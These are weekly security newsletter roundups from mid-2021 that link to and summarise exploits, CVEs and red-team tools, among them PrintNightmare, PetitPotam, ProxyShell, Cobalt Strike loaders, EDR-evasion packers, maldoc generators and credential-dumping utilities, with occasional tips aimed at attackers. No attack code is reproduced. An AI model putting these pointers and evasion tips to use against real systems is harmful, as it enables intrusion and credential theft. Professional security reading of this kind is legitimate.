• Revealed: leak uncovers global abuse of cyber-surveillance weapon. The latest model of iPhone on the latest version of iOS appears to be vulnerable to a 0click remote code execution exploit developed by NSO group and used to target political enemies and human rights activists around the world. While it isn't persistent, exploitation is reliable enough to simply re-exploit target devices. If you are an Android user feeling smug, rest assured there is a 0click RCE out there for your device as well. Stay updated and reboot your phones often! NSO group has denied any wrongdoing while releasing contradictory statements. Details and IOCs here, and a tool for analysis of backups or filesystem dumps here.
• Hooking Candiru Another Mercenary Spyware Vendor Comes into Focus. More shady Israeli "cybersecurity" firms selling 0days that end up being used against political enemies. You've got to hand it to the "startup nation," it's been churning out more 0day vendors (likely unit 8200 "graduates") than any other country.
• How we protect users from 0-day attacks. This post details three campaigns: emailed links, Office documents that loaded web content in IE, and LinkedIn messages with links to exploit 0days in Chrome and IE.
• Rewards for Justice – Reward Offer for Information on Foreign Malicious Cyber Activity Against U.S. Critical Infrastructure. The US government is offering rewards for tips that lead to the identification or location of any person who, while acting at the direction or under the control of a foreign government, participates in malicious cyber activities against U.S. critical infrastructure. They are running a SecureDrop instance on Tor as well. Maybe it is already working? An interesting note: "Reward payments may include payments in cryptocurrency." This is the first time, to my knowledge, the US federal government has offered to transact in cryptocurrency in any capacity.
• Advancing email security for Gmail and beyond with BIMI. The new Brand Indicators for Message Identification (BIMI) is a standard for hosting images to be included as logos for emails. It requires a SPF, DKIM, a good DMARC policy, a special type of SVG, a special DNS entry, and for verification: the logo be trademarked, and then a "verified mark certificate" (VMC) must be purchased and hosted with the SVG. Hopefully Let's Encrypt will be a VMC issuer soon?
• Windows Print Spooler Elevation of Privilege Vulnerability. PrintNightmare refuses to die. Benjamin Delpy has been keeping the PoCs rolling, even creating a "privesc as a service" hosting two printers that will write to System32 as SYSTEM. Don't worry, it works against non-domain joined Windows 11 machines too. If you wrap buggy code from 1994 in virtualization based security, it's still buggy code. Confused on how this all works? Read this: Windows Print Spooler Elevation of Privilege vulnerability (CVE-2021-1675) explained.
• The new #OpenSecurityTraining2 site has been launched at ost2.fyi!. Anyone can now sign up for the public betas of the first classes (with more to come soon!).
• [DEVELOPING] Windows 10 feature upgrades leave SAM and SYSTEM hive readable by any user. This has been seen on Windows 11 and fully up to date Windows 10.

Techniques

• Aruba in Chains: Chaining Vulnerabilities for Fun and Profit. Finding "smaller" bugs and then chaining them together leads to full unauthenticated remote code execution against an Aruba router running Aruba Instant. PoC here.
• Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 2. Connor is back with another banger. Another full walk through with detailed steps, screenshots, and full code. If you are interested in exploit development for windows, this is a must read.
• Remote code execution in cdnjs of Cloudflare. A vulnerability in the way Cloudflare automatically updated its JavaScript CDN allowed for RCE. Props to Cloudflare for the near instant incident response and remediation - impressive.
• Evade Sandboxes With a Single Bit – the Trap Flag. A relatively simple check can be used to determine if you are in a VM or on an actual host.
• Fetching SharpHound data entirely in-memory (no dropped ZIP or JSON files) using BOF.NET and Cobalt Strike. This is so good I had to test and implement it in my tooling the same day. Stop dropping files to target (even encrypted), and pull them straight back via BOF.NET. Be sure to check out this commit to CredBandit if you are interested in implementing this in your own BOFs (or just use the new BOF.NET). @spotheplanet has an updated section on dumping to memory as well.
• Gotta Catch 'Em All: Frida & jailbreak detection. If you have any interest in iOS security or jailbreak detection, this post is full of great details.

Tools and Exploits

• CVE-2021-3492 is an exploit in the shiftfs driver in Ubuntu that was introduced in April 2019, affecting at least 20.04 and 20.10. It was used in Pwn2Own successfully, with the full details released this week in a blog post.
• SharpImpersonation is a token impersonation tool written in C#. Lots of details in this blog post.
• SharpExcelibur is a tool to read Excel spreadsheets (XLS/XLSX) using Cobalt Strike's execute-assembly functionality.
• injectAmsiBypass is a Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection.
• PetitPotam is a PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function. Disabling the EFS service seems not to mitigate the "feature".
• CheeseSQL is Command Exec / Lateral Movement via MSSQL Trust. This tool has been developed to overcome some of the limitations given by already existing tools like ESC, mostly regarding MSSQL impersonation. Moreover, CheeseSQL has been specifically modified to run from Covenant (via reflective loading), and to automate the most important phases of MSSQL trust abuse.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• CVE-2020-1020-Exploit is the type1 font pool overflow LPE exploit. Supported OS: Windows 7,8,8.1 x64.
• kerlab A Rust implementation of Kerberos for fun and detection. Implements a few Kerberos features from Rubeus as well as credential spraying and offline brute forcing.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• Updates Regarding VSA Security Incident. Kaseya got their hands on a universal decrpytor for the randomsware that hit thousands of their customers on the Friday before the July 4th holiday in the US. They state that, "in no uncertain terms that Kaseya did not pay a ransom – either directly or indirectly through a third party – to obtain the decryptor." This leaves two possibilities: Someone found a flaw in the encryption scheme a professional ransomware crew with years of experience was using, or someone acquired the universal decryptor key without paying for it (leak, hack, deal to not get arrested by the FSB, etc). If there was a flaw in the encryption, have researchers been sitting on it like the allies allowed ships to be sunk after breaking the Enigma cypher in WWII? Was the Kaseya incident big enough to "burn" the technique? With the disappearance of REvil's public infrastructure, I suspect the FSB came knocking, demanded the key, and told them to take a nice vacation on the Black Sea while things cool off.
• OpenVPN Security Improvements and Changes. Two Ukrainian Windscribe VPN servers were seized and since they were unencrypted and had persistent disks, the authorities got hold of the OpenVPN private keys. In the age of ubiquitous HTTPS and HSTS preloading VPNs are effective against a very specific threat model, and are probably unnecessary for most people (despite what the YouTube ads will tell you).
• CVE-2021-36934 aka HiveNightmare aka SeriousSAM. For some reason, Windows 10 starting with 1909 and Server 2019 modified the SAM database access control lists to allow regular users to read the contents. While the files are locked by lsass normally, if the system has volume shadow copies (VSS), they will be available there. Check out CVE-2021-36934 to check for shadow copies and read them all in memory, and this Velociraptor query to hunt for it.

Techniques

• PetitPotam. While this was in last week's Tool/Exploits section, it has hit the news this week. Besides the classic Unconstrained Delegation method, there was talk of the following ways to leverage PetitPotam.

  • Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability. SANS covers the PetitPotam + ADCS + Impaket + Rebeus route.
  • WebDAV + NTLM is also an option
  • Find a computer with a path to AD and SMB relay
  • Mimikatz + Kekeo + Impacket
  • Microsoft's response: Won't fix

• CVE-2021-3438: 16 Years In Hiding – Millions of Printers Worldwide Vulnerable. A sloppy strncopy with a size parameter controlled by the user in this driver from 2005 can lead an unprivileged user to SYSTEM. Look for the SSPORT.sys driver on your next engagement.
• Sequoia: A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer (CVE-2021-33909). A size_t-to-int type conversion vulnerability in the Linux Kernel’s filesystem layer affecting most Linux operating systems (3.16 through 5.13.x before 5.13.4). Any unprivileged user can gain root privileges on a vulnerable host by exploiting this vulnerability in a default configuration. You can use cve-2021-33909-crasher.c to test if the vulnerability exists on systems, but a user to root PoC isn't in the wild yet. This could be the Dirty COW of 2021.
• fail2ban – Remote Code Execution. While not exploitable without MiTM or the ability to set whois information, the ~! feature of the mail binary can be abused to inject commands to any program that passes attacker controlled input to mail.
• Exfiltrating a victim's exact location (to within 5m). This is a great example of getting inside the mind of the defender to speculate what they did to "fix" a vulnerability, and then exploiting that "fix."
• Windows Command-Line Obfuscation. "Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analyzing other executables." Check out windows-command-line-obfuscation for the scripts and raw data.
• All Your Base Are [Still] Belong To Us: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers. Ever wanted to discover a potential RCE against a AAA multiplayer game without all that hardcore reverse engineering? Hit it with a well tuned fuzzer and let the vulnerabilities fall out!
• On Disk, The Devil’s In The Details. When persisting, or otherwise dropping files to disk, professionals will do the extra work to make their exes and dlls blend in. You should too! One tool not mentioned that I find useful: PeFixup.
• Guide to Named Pipes and Hunting for Cobalt Strike Pipes. It's probably worth going through your profiles to ensure your pipe names aren't in the table of default and common profile pipe names.
• OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux). This is a nice post on how to extract private keys from the memory space of OpenSSH after the introduction of "shielded private keys."

Tools and Exploits

• Beaconator is an aggressor script for Cobalt Strike used to generate a raw stageless shellcode and packing the generated shellcode using PEzor.
• smartbrute is a smart password spraying and bruteforcing tool for Active Directory Domain Services. Supports NTML over SMB or LDAP as well as Kerberos pre-authentication bruteforcing. It can also intelligently bruteforce a domain to prevent user lockouts.
• inno-shellcode-example is an InnoSetup template to that runs shellcode! How easy is it to convince a user they need to install Zoom, Adobe Reader XYZ, or whatever-app to join your meeting, read your document, etc? Now you can have a legit installer with some extra shellcode injection!
• Medusa is a cross-platform C2 agent compatible with Python 2.7 and 3.8, compatible with Mythic. This new agent has some nice features, but does require Python (just a base install) on the target to run.
• LittleCorporal is a C# automated maldoc generator. It uses a two step process to first self-inject into Word via an AutoOpen macro, and then inject the real payload from word into a running process. The use of InlineShape and automated building is just the cherry on top.
• ppmap is a scanner/exploitation tool written in Go, which leverages Prototype Pollution to XSS by exploiting known gadgets. Use this on your next web app assessment or bug bounty.
• dock-droid is dockerized android. Run QEMU Android x86 and Android ARM in a Docker with X11 Forwarding. This could be useful for CI/CD for Android or for poking at Android apps "live."
• BadAssMacros is an automated malicious macro generator written in C# with capabilities like VBA purging, sandbox detections, and shellcode obfuscation.
• RemotePotato0 Cross Session Activation. Version 1.1 drops the requirement for the victim to be in session 0. Now you can coerce and relay NTLM authentication from any user in any session!
• Detect-Hooks is a proof of concept Beacon Object File (BOF) that attempts to detect userland API hooks in place by AV/EDR. The BOF will return a list of detected API hooks or let the operator know no hooks were detected. This can be useful knowledge to have before performing certain post-exploitation actions.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• git-split-diffs brings GitHub style split diffs to your terminal.
• dorothy is a tool to test security monitoring and detection for Okta environments.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• Welcome to Bug Hunter University. Google launches their own educational content aimed at bug hunters that are working on Google products. Don't expect technique walkthroughs, this is more of a detailed guide on how to bug hunt against Google (i.e. what is in scope, what is considered auth bypass, etc).
• CISA Announces New Vulnerability Disclosure Policy (VDP) Platform. The US federal government is getting into the bug bounty game with the help of BugCrowd. The Department of Homeland Security (DHS), the Department of Labor (DoL), and the Department of Interior (DoI) are among the agencies planning to leverage this platform at the onset.
• Amazon hit by record $887 million EU privacy fine. The EU says Amazon processed personal data in ways that violated GDPR requirements, Amazon said the decision was "without merit." Looks like the real winners in this case will be the lawyers.
• MDSec pushes Nighthawk C2 framework PR via Twitter. The upcoming commercial C2 from MDSec looks like it has some pretty interesting features: hot swappable C2 profiles, in memory encryption for evasion, BOF compatibility, etc. "Coming soon."
• Introducing BloodHound Enterprise: Attack Path Management for Everyone. The enterprise version of the extremely popular BloodHound tool is out now! If you have a massive AD environment, it is likely worth the cost to get what amounts to a top tier AD penetration test with helpful interactive remediation and retesting.
• PortSwigger launches Burp Suite Certified Practitioner. All the training material and even a practice exam are available for free, and the cost is very reasonable at $99. The certification expires after five years with no word on if you have to pay to "maintain" it beyond that time.

Techniques

• NTLM relaying to AD CS - On certificates, printers and a little hippo. The AD GOAT is back to lay it down on NTLM relaying, and even add a little bit of his own twist with PKINITtools. If you only read one post about the latest AD CS relaying and PetitPotam, read this one. Want to use Cobalt Strike for this? Read NTLM Relaying via Cobalt Strike.
• Developing an exploit for the Jira Data Center Ehcache RCE (CVE-2020-36239). I love this kind of post. It walks through every step from reading a bug advisory to RCE and all the struggles, blog posts, and different attempts along the way.
• From Stolen Laptop to Inside the Company Network. Think your BitLocker encrypted laptop is safe from a determined adversary? Think again. The trusted platform module (TPM) sends the BitLocker encryption key via Serial Peripheral Interface (SPI) in plaintext. A bit of research and a quick hookup with Saleae spill the beans. The SSD was then extracted and decrypted. Because the target had a "pre-logon" VPN tunnel setup, the assessors were able to build a test VM and connect to internal file shares. Very nice work against a hardened laptop. Enable that pre-boot authentication!
• Stealing Tokens In Kernel Mode With A Malicious Driver. This post walks through building a simple driver to copy access tokens between PIDs to allow user spoofing or privilege escalation. Bypassing driver signing is another topic all together, but the basics of kernel development and userspace to kernel communication are covered here nicely.
• Root Cause Analysis of a Printer’s Drivers Vulnerability CVE-2021-3438. Last week's SSPORT.sys printer driver vulnerability may have been oversold! VoidSec breaks down the root cause and describes why it can be, at best, a denial of service exploit.
• WebContent->EL1 LPE: OOBR in AppleCLCD / IOMobileFrameBuffer. If nothing else, this is good proof of "parallel discovery" even against a "hard target" like iOS. The POC is available, but without the arbitrary read/write needed to finish it.
• Fuzzing Windows RPC with RpcView introduces the process to enumerate RPC servers with RpCView. Expect some good stuff from itm4n as a result of this.
• The path to code execution in the era of EDR, Next-Gen AVs, and AMSI introduces inceptor, a template-based PE packer for Windows, designed to help penetration testers and red teamers to bypass common AV and EDR solutions. Inceptor has been designed with a focus on usability, and to allow extensive user customization. Inceptor is a framework that wraps many other useful tools, sgn, sRDI, donut, DInvoke, Syswhispers, ConfuserEx, Chameleon, LLVM-Obfuscator, and others to create an easy to use tool chain to wrap, compile, and obfuscate input shellcode or PE files. This could be a very useful base to extend with private templates and incorporate into your own workflow.
• Universal Privilege Escalation and Persistence – Printer. The PrintNightmare saga may have cooled off, but this post explores how to set up your own rogue printer for that double-click to system privilege escalation.

Tools and Exploits

• byeintegrity8-uac is a Windows 7 to Windows 11 compatible "Always Notify" UAC bypass. It's also been implemented in UACME as technique #69.
• Issue 2186: Exchange: AD Schema Misconfiguration Elevation of Privilege. Installing Exchange in an AD environment modified the AD schema in a way that allowed computer accounts to create arbitrary AD objects as children (users, etc). This was patched in the Exchange cumulative updates release on 2021-06-29 but is worth checking for on your next assessment.
• Introducing Mimikatz Kit. HelpSystems has decoupled Mimikatz from CobaltStrike releases with Mimikatz Kit. With the rapid rate of new features in Mimikatz recently this is a welcome change.
• raider is a framework designed to test authentication for web applications. While web proxies like ZAProxy and Burpsuite allow authenticated tests, they don't provide features to test the authentication process itself, i.e. manipulating the relevant input fields to identify broken authentication. Most authentication bugs in the wild have been found by manually testing it or writing custom scripts that replicate the behaviour. Raider aims to make testing easier, by providing the interface to interact with all important elements found in modern authentication systems. It uses a Lisp like configuration language to control the authentication flows.
• ADCSPwn is a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts (Petitpotam) and relaying to the certificate service. This is your easy button for PetitPotam + ESC8 exploitation.
• NinjaC2 V2.1 : New webshell agent, more features and updated AV bypass. The update adds a webshell and a few other AV bypass features.
• Linux_LPE_eBPF_CVE-2021-3490 is an LPE exploit for CVE-2021-3490. Tested on Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58. and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17. Full details in Kernel Pwning with eBPF: a Love Story.
• pywhisker is a Python equivalent of the original Whisker made by Elad Shamir and written in C#. This tool allows users to manipulate the msDS-KeyCredentialLink attribute of a target user/computer to obtain full control over that object. It's based on Impacket and on our Python equivalent of Michael Grafnetter's DSInternals called PyDSInternals. This tool, along with Dirk-jan's PKINITtools allow for a complete primitive exploitation on UNIX-based systems only.
• targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print "kerberoast" hashes for user accounts that have a SPN set. This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the "kerberoast" hash, and delete the temporary SPN set for that operation. This is called targeted Kerberoasting. This tool can be used against all users of a domain, or supplied in a list, or one user supplied in the CLI.
• scarecrow_wrapper is wrapper payload for Mythic that wraps any agent shellcode with the ScareCrow loader. This wrapper currently supports CPL, EXE, and DLL payload types from ScareCrow.
• MicrosoftWontFixList. Are you lost in all the "Won't fix" vulnerabilities released or discovered in July? This page has them all summarized for you.
• spawn is a Cobalt Strike BOF that spawns a sacrificial process, injects it with shellcode, and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG), BlockDll, and PPID spoofing.
• hallucinate is a one-stop TLS traffic inspection and manipulation using dynamic instrumentation. For more information check out the introductory blog post.
• ligolo-ng is an advanced, yet simple, tunneling/pivoting tool that uses a TUN interface. Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
• revealin is a tool to uncover the full name of a target on Linkedin by taking advantage of the autocomplete feature.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• WireGuardNT, a high-performance WireGuard implementation for the Windows kernel. The WireGuard team continues to impress with a Windows kernel driver to increase speed (up to 5x speedup) and decrease battery usage. It's currently experimental and can be enabled with reg add HKLMSoftwareWireGuard /v ExperimentalKernelDriver /t REG_DWORD /d 1 /f.
• Apple's Plan to "Think Different" About Encryption Opens a Backdoor to Your Private Life. The company that once said, "What happens on your iPhone stays on your iPhone," and famously refused to unlock a terrorist's iPhone is rolling out software that will scan images on an iPhone. This type of client-side scanning breaks end to end encryption, and while it is being used initially to combat child exploitation, how difficult would it be to use the same system to censor or report on iPhone users that share images such as "tank man?"

• Cobalt Strike News

  • Cobalt Strike 4.4: The One with the Reconnect Button. In addition to some nice to have features, 4.4 comes with some major OPSEC changes. Users can now define their own reflective loader and sleep obfuscation technique. This should make it much more difficult to statically signature Cobalt Strike in memory. A good primer for the sleep mask functionality is Sleeping with a Mask On. For the customer loader this blog post is a good starting place for creating a DLL injector BOF.
  • Cobalt Strike DoS Vulnerability (CVE-2021-36798). "Hotcobalt" was an issue with screenshot processing on the Cobalt Strike teamserver that allowed a "malicious" beacon to crash the teamserver. More details on the SentinelOne blog.
  • Introducing Cobalt Strike Community Kit. The Community Kit is a great place to find community additions to the popular C2 framework. Be sure to vet anything before using it live!

• Kubernetes Hardening Guidance. The NSA and CISA drop 59 pages of Kubernetes hardening guidance. Just because you can push code to a cluster in one command doesn't mean you can forget about the security implications of doing so.
• The Conti ransomware gang (aka Hermes aka Ryuk) had some of their "affilaite" training material leak last week. Here is a roughly translated PDF if you are interested in their tradecraft.

Techniques

• You're Doing IoT RNG. "Basically, every IoT device with a hardware random number generator (RNG) contains a serious vulnerability whereby it fails to properly generate random numbers, which undermines security for any upstream use."
• A New Attack Surface on MS Exchange Part 1 - ProxyLogon! and A New Attack Surface on MS Exchange Part 2 - ProxyOracle!. The master Orange Tsai is back to shell Exchange some more. This variant is dubbed "ProxyShell" and despite being patched in April a good number of Exchange servers on the internet appear to be vulnerable. Double check those patches and grab the web_exchange_proxyshell.yml Sigma rule.
• HTTP/2: The Sequel is Always Worse. There are some tricky issues with HTTP/2, especially in an environment of load balancers, front and back end request processors, and the like. Web app assessors or bug bounty folks should pay special attention to this one.
• Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Archive Extraction – CVE-2021-22937 (Patch Bypass). Some bugs don't die on the first patch. NCC Group takes a swing at Pulse Secure and develops a patch bypass for an authenticated remote code execution vulnerability.
• Snapcraft Packages Come With Extra Baggage: Exploiting Ubuntu's Snapcraft Apps with CVE-2020-27348. A crash while launching docker led to a "DLL sideloading" type issue against the snap container engine in Ubuntu. While the bug was patched in March of 2021, this is a great writeup.
• Bypassing Windows Hello Without Masks or Plastic Surgery. By spoofing an external USB camera, researchers were able to bypass Windows Hello authentication. It does require an IR photo of the victim, but otherwise becomes a quick USB skeleton key to the targeted Windows computer.
• Multi-Stage Offensive Operations with Mythic. Modular toolkits, varied C2 mechanisims, but a unified back end are the future of offensive operations.
• Admin’s Nightmare: Combining HiveNightmare/SeriousSAM and AD CS Attack Path’s for Profit. With all the Windows issues recently, it was only a matter of time until someone made a combo attack walkthrough.
• Relaying NTLM authentication over RPC again…. "Due to the absence of global integrity verification requirements for the RPC protocol, a man-in-the-middle attacker can relay his victim’s NTLM authentication to a target of his choice over the RPC protocol." No code released yet.
• CVE-2021-0090: Intel Driver & Support Assistant (DSA) Elevation of Privilege (EoP). "Intel Driver & Support Assistant (DSA) is a driver and software update utility for Intel components. DSA version 20.8.30.6 (and likely prior) is vulnerable to a local privilege escalation reparse point bug. An unprivileged user has nominal control over configuration settings within the web-based interface. This includes the ability to configure the folder location for downloads and data (e.g. installers and log files). An unprivileged user can change the folder location, coerce a privileged file copy operation to a “protected” directory through a reparse point, and deliver a payload such as a DLL loading technique to execute unintended code."

Tools and Exploits

• DeployPrinterNightmare is a C# tool for installing a shared network printer abusing the PrinterNightmare bug to allow other network machines easy privesc!
• whoc is a container image that extracts the underlying container runtime and sends it to a remote server. Poke at the underlying container runtime of your favorite CSP container platform!
• Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS). This is the toolset promised with the release of Certified Pre-Owned: Abusing Active Directory Certificate Services in June of 2021. A recent post covered the attacks in more practical terms.
• EyeWitnessTheFitness is a combination of EyeWitness (web screenshot OSINT tool) and fireprox (IP rotation proxy via AWS API gateway) that only uses one fireprox API for all EyeWitness targets.
• SigFlip is a tool for patching authenticode signed PE files (exe, dll, sys, etc) without invalidating or breaking the existing signature. This looks particularly nasty and is used by APT 10.
• SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion. This tool was released along side the talk Operation Bypass Catch My Payload If You Can.
• BeaconEye scans running processes for active CobaltStrike beacons. When processes are found to be running beacon, BeaconEye will monitor each process for C2 activity. Check out IsBeaconProcess to make sure your beacon wouldn't get picked up.
• concealed_position is a local privilege escalation attack against Windows using the concept of "Bring Your Own Vulnerability". Specifically, Concealed Position (CP) uses the as designed package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with known vulnerabilities which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.
• haklistgen is a tool that turns any junk text into a usable wordlist for brute-forcing (subdomains, words in HTTP response, etc).

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• RegExp is a replacement for the Windows built-in Regedit.exe tool. Improvements over that tool includes many enhanced features.
• reverse-ssh is a A statically-linked ssh server with a reverse connection feature for simple yet powerful remote access.
• dnsmonster is a passive DNS collection and monitoring built with Golang, Clickhouse and Grafana. This is a scalable solution to do enterprise DNS monitoring.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• Apple drops intellectual property lawsuit against maker of security tools. The battle against the virtual iOS device host finally ends with a fizzle. The case was scheduled to start next week. "The terms of the settlement were confidential."
• AI Wrote Better Phishing Emails Than Humans in a Recent Test. This is the dystopian future we were promised.

Techniques

• Having fun with a Use-After-Free in ProFTPd (CVE-2020-9273). This post analyzes the ProFTPd vulnerability and how to exploit it bypassing all the memory exploit mitigations present by default (ASLR, PIE, NX, Full RELRO, Stack Canaries etc). Two different exploits available at CVE-2020-9273.
• How to Hack APIs in 2021. Type confusion, JWTs, undocumented APIs, versioning, rate limiting, race conditions, XXE injection, switching content types, HTTP methods, injection vulnerabilities, and more are covered in this great post.
• Comparison of reverse image searching in popular search engines [OSINT hints]. TLDR: consider Yandex next time you need to reverse search an image.
• TeamServer.prop. Have you been wondering what those TeamServer.prop warnings were in Cobalt Strike 4.4? It turns out you can tweak the screenshot and keylog callback data settings to customize how the team server handles potentially DoS-able data.
• Spoofing File Extensions Using Google Drive and OneDrive. The tricks in this post may be helpful when/if you deliver payloads via email.
• Playing Detection with a Full Deck. If you've ever done any Purple teaming, this post will hit home. Understanding the full context of a system (i.e. how are services created) is critical to good detection rules.
• Phishing for NetNTLM Hashes. There are many ways to leak NTLM hashes but this post shows the results of testing and Security Zones are treated by web clients. Once you have NTLM and network access, this relay page has amazing charts for what is possible.
• Going for the Gold: Penetration Testing Tools Exploit Golden SAML. Golden SAML hit the headlines after the SolarWinds breach, and this post breaks down how powerful it can be. The three custom tools they mention are not public.
• Tools, Techniques, and Grimmie?: Experimenting w/ Offensive ADSI. Did you know there was a built in AD enumeration tool as far back as Windows 7 called adsisearcher?
• SAML is insecure by design. SAML is bad and should feel bad. Lots of good ammo in here for your next web assessment that uses SAML.
• [EX007] How playing CS: GO helped you bypass security products. The use of a vulnerable driver allows reading process memory from a userland helper to dump lsass while EDR watches helplessly.
• Fingerprinting Windows versions, AV, wireless cards over the network—all without authentication. Rumble uses DCE/RPC UUIDs to fingerprint AV, EDR, and other software agents remotely and unauthenticated. This could be very useful for advanced red teams attempting to avoid detection.

Tools and Exploits

• CobaltStrikeReflectiveLoader is perhaps the first public User-Defined Reflective Loader for Cobalt Strike 4.4. If you are writing your own, be ready to write a lot of assembly...
• ProxyShell is the Exchange Server RCE (ACL Bypass + EoP + Arbitrary File Write) patched in April and May of 2021 (but not published in an advisory until July 2021). Also check out proxyshell-poc. See here for the technique break down: My Steps of Reproducing ProxyShell.
• MiniDump is a C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps.
• LazySign creates fake certs for binaries using windows binaries and the power of bat files. If you're on Linux try Limelighter.
• CobaltSpam is a tool based on CobaltStrikeParser from SentinelOne which can be used to spam a CobaltStrike server with fake beacons.
• COM-Hijacking is an example of COM hijacking using a proxy DLL.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• raivo-otp / ios-application. A native, lightweight and secure one-time-password (OTP) client built for iOS; Raivo OTP! Why switch from my current OTP app? See here.
• reko is a decompiler for machine code binaries. If Ghidra or redare2/Rizin aren't your thing, give reko a shot.
• SysmonTools contains the following: Sysmon View: an off-line Sysmon log visualization tool, Sysmon Shell: a Sysmon configuration utility, and Sysmon Box: a Sysmon and Network capture logging utility.
• RmiTaste allows security professionals to detect, enumerate, interact and exploit RMI services by calling remote methods with gadgets from ysoserial.
• REW-sploit can get a shellcode/DLL/EXE, emulate the execution, and give you a set of information to help you in understanding what is going on. Example of extracted information are: API calls, encryption keys used by MSF payloads, decrypted 2nd stage coming from MSF, and Cobalt-Strike configurations (if CobaltStrikeParser is installed).

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• Apple CSAM fallout:

  • Opinion: We built a system like Apple’s to flag child sexual abuse material — and concluded the tech was dangerous. A group from Princeton built a similar system to what Apple has deployed and decided it was too dangerous to put into practice. "Apple is gambling with security, privacy and free speech worldwide."
  • Working Collision? #1. This was the start of the collisions but it quickly snowballed.
  • neural-hash-collider can generate collisions on demand.
  • Had enough of Apple? Look into GrapheneOS, CalyxOS, or even a PinePhone.

• Apple Appeals Corellium Copyright Lawsuit Loss After Settling Other Claims. Last week the news section had a good news story about Apple dropping a case against Corellium. They've appealed the other case they lost. All this while claiming security researchers would be a check against CSAM scanning abuse...
• A Hacker Stole and Then Returned $600 Million. The wild west of finance sees it's largets heist yet (yes, bigger than Mt. Gox). For technical details (facepalm warning) check out rekt.
• Microsoft announces price increase for Office 365 and Microsoft 365. E5 is still crazy expensive.
• Porchetta Industries Launches. "The Information Security Industry doesn't have a direct way to support Offensive & Defensive Open Source Security Tool developers even though it relies on them for a large portion of their services and/or internal capabilities. We're here to change that. Porchetta Industries provides a centralized platform for organizations to fund and support Open Source Security Tools."

Techniques

• 1Password Secret Retrieval — Methodology and Implementation. Password managers are a juicy target for post-exploitation. This post explores the 1password password manager and offers some detection tips. If an attacker is injecting code into processes undetected, it might be too late. Check out 1PasswordSuite for the tools.
• Executing Code In Context Of A Trusted Agent (Part 1) - Windows Defender Antivirus. The only thing better than bypassing AV is running in the context of AV itself. PoC here.
• Introducing GoKart, a Smarter Go Security Scanner. If you've got some Go code to review or are trying to exploit, give gokart a shot.
• Domain Escalation – PrintNightmare. Need a refresher or reference on all the PrintNighmare madness? This post covers remote discovery and exploitation.
• Uncovering Tetris – a Full Surveillance Kit Running in your Browser. A watering hole attack used JSON Hijacking and other methods to attempt to identify users. It even attempted to steal secrets from the user's local machine using websockets!
• Oh, Behave! Figuring Out User Behavior. Once you gain access to a target workstation, how do you determine what the user does day to day? Which applications would be best to backdoor for persistence? This post explores some ways to answer these questions.
• Spoofing Azure AD sign-ins logs by imitating AD FS Hybrid Health Agent. If you have local admin you can export the AD FS Hybrid Health Agent secret and spam the Azure AD sign-in logs with fake entries.
• Creating the WhereAmI Cobalt Strike BOF. Bobby has been on a roll, churning out BOFs at a rapid pace. It likely took significant extra time to document and write up the process behind whereami which dumps the environment variables without calling the WinAPI, and for that I am grateful!
• Responder's DHCP Poisoner. Responder 3.0.7.0 comes with a new DHCP module! Learn about it in this post.
• Razer Windows LPE. Simply attaching a Razer mouse (or a spoofed one) will run a UI as SYSTEM that you can use to open a file dialog and spawn a prompt with. I don't believe this has been weaponized without physical access or desktop interaction yet.
• Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082). This is a great in-depth post on the productization of an integer overflow into RCE.

Tools and Exploits

• Added EfsRpc method (aka PetitPotam). SweetPotato gets a PetitPotam upgrade so if you have SeImpersonatePrivilege on a fully patched windows 10 machine, you can get SYSTEM.
• ServiceMove-BOF is a new lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution. Note that is work on Windows 10 1809 or above only.
• BOF-ForeignLsass dumps lsass memory by opening a handle to a process that already has a handle open to lsass, with the hopes of looking less suspicious by stealing this "legitimate" handle.
• kubescape is the first tool for testing if Kubernetes is deployed securely as defined in Kubernetes Hardening Guidance by to NSA and CISA.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

